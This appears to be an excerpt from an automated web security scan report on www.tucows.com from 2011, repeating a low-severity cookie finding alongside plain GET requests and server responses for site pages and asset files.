<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Contact Us</title> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
